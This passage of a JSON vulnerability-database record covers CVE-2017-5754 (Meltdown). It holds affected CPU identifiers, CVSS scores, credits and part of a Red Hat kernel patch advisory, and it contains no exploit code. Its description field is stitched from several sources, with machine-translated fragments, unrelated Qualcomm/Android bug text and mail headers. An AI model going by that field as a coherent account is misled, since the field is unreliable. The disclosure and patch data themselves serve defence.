                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m7:6y75:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y54:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y51:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4960hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4980hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4720hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4765t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4510u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4400e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4360u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4288u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4112e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4020y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4025u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:arm:cortex-a:75:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "These issues were researched and reported by researchers at Google Project Zero (Jann Horn) the Institute of Applied Information Processing and Communications (IAIK) at Graz University of Technology (Gruss et. al.), Paul Kocher, and Anders Fogh.This document was written by Art Manion and Will Dormann.",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#584653"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2017-5754",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "Single",
            "author": "IPA",
            "availabilityImpact": "None",
            "baseScore": 4.4,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2018-001001",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:S/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CNVD-2018-00303",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-113957",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.1,
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "IPA",
            "availabilityImpact": "None",
            "baseScore": 4.7,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2018-001001",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-5754",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "IPA",
            "id": "JVNDB-2018-001001",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-00303",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-113957",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113957"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. Has speculative execution function and out-of-order execution function CPU Several researchers have reported methods of performing side-channel attacks against Has speculative execution function and out-of-order execution function CPU side-channel attack method against (Spectre and Meltdown) has been reported. For more information, Google Project Zero blog post in (\"Reading privileged memory with a side-channel\") or Graz University of Technology (TU Graz) information from researchers in (\"Meltdown and Spectre\") Please refer to. \"Reading privileged memory with a side-channel\"https://googleprojectzero.blogspot.jp/2018/01/reading-privileged-memory-with-side.html\"Meltdown and Spectre\"https://meltdownattack.com/Sensitive information can be obtained from processes running with user privileges. Spectre As for the attack, crafted Javascript by the code Javascript cannot be obtained from web It has been reported that data can be obtained during the browser process. SpectreMeltdownCPU mechanism for triggeringSpeculative execution from branch predictionOut-of-order executionAffected platformsCPUs that perform speculative execution from branch predictionCPUs that allow memory reads in out-of-order instructionsDifficulty of successful attackHigh - Requires tailoring to the software environment of the victim processLow - Kernel memory access exploit code is mostly universalImpactCross- and intra-process (including kernel) memory disclosureKernel memory disclosure to userspaceSoftware mitigationsVariant 1: Compiler changes. Web browser updates to help prevent exploitation from JavaScriptVariant 2: Indirect Branch Restricted Speculation (IBRS). Note: The software mitigation for Spectre variant 2 requires CPU microcode updatesKernel page-table isolation (KPTI)CVE-2017-5715 Affected\nCVE-2017-5753 Affected\nCVE-2017-5754 Affected. Two vulnerabilities are identified, known as \"Variant 3a\" and \"Variant 4\". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Spectre vulnerability exists in the CPU processor core. Because Intel does not separate low-privileged applications from accessing kernel memory, an attacker can use a malicious application to obtain private data that should be quarantined. \nAttackers can exploit this issue to obtain sensitive information that may aid in further attacks. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. \nAn attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. \nThese issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Intel and ARM CPU chips have an information disclosure vulnerability, which originates from a flaw in the processor data boundary mechanism. The following products and versions are affected: ARM Cortex-A75; Intel Xeon E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4; Xeon E3-1245 v2, v3, v5, v6; Xeon X7542 wait. \n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754)\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nBug Fix(es):\n\n* If an NFSv3 client mounted a subdirectory of an exported file system, a\ndirectory entry to the mount hosting the export was incorrectly held even\nafter clearing the cache. Consequently, attempts to unmount the\nsubdirectory with the umount command failed with the EBUSY error. With this\nupdate, the underlying source code has been fixed, and the unmount\noperation now succeeds as expected in the described situation. (BZ#1538588)\n\n* The kernel build requirements have been updated to the GNU Compiler\nCollection (GCC) compiler version that has the support for Retpolines. The\nRetpolines mechanism is a software construct that leverages specific\nknowledge of the underlying hardware to mitigate the branch target\ninjection, also known as Spectre variant 2 vulnerability described in\nCVE-2017-5715. (BZ#1554254)\n\n4. X-Scanned-By: MIMEDefang 2.79 on 10.5.11.16\nX-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.5.16 (mx1.redhat.com [10.5.110.25]); Thu, 04 Jan 2018 01:01:01 +0000 (UTC)\n\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security update\nAdvisory ID:       RHSA-2018:0008-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2018:0008\nIssue date:        2018-01-03\n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a commonly\nused performance optimization). There are three primary variants of the\nissue which differ in the way the speculative execution can be exploited. \n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software mitigation\nfor this hardware issue at a cost of potential performance penalty. Please\nrefer to References section for further information about this issue and\nthe performance impact. \n\nIn this update mitigations for x86-64 architecture are provided. \n\nVariant CVE-2017-5753 triggers the speculative execution by performing a\nbounds-check bypass. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nboundary and read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2017-5753, Important)\n\nVariant CVE-2017-5715 triggers the speculative execution by utilizing\nbranch target injection. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nand guest/host boundaries and read privileged memory by conducting targeted\ncache side-channel attacks. (CVE-2017-5715, Important)\n\nVariant CVE-2017-5754 relies on the fact that, on impacted microprocessors,\nduring speculative execution of instruction permission faults, exception\ngeneration triggered by a faulting access is suppressed until the\nretirement of the whole instruction block. In a combination with the fact\nthat memory accesses may populate the cache even when the block is being\ndropped and never committed (executed), an unprivileged local attacker\ncould use this flaw to read privileged (kernel space) memory by conducting\ntargeted cache side-channel attacks. (CVE-2017-5754, Important)\n\nNote: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64\nmicroprocessors are not affected by this issue. \n\nRed Hat would like to thank Google Project Zero for reporting these issues. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass\n1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-headers-2.6.32-696.18.7.el6.ppc64.rpm\nperf-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-headers-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm\nperf-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 